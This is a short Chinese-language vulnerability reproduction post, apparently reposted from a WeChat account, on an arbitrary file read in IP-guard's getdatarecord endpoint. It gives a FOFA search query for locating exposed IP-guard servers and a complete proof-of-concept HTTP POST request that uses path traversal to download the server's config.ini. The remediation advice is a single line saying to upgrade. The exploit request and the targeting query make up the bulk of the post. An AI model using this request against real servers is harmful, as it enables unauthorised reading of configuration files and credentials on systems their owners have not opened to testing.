漏洞描述
资产确定
fofa:
app="IP-guard"
漏洞复现
1.利用如下POC进行文件读取
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 64Content-Type: application/x-www-form-urlencodedpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
修复建议
1.升级至安全版本
如有侵权,请联系删除
原文始发于微信公众号(我爱林):漏洞复现 || IP-guard getdatarecord 任意文件读取
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论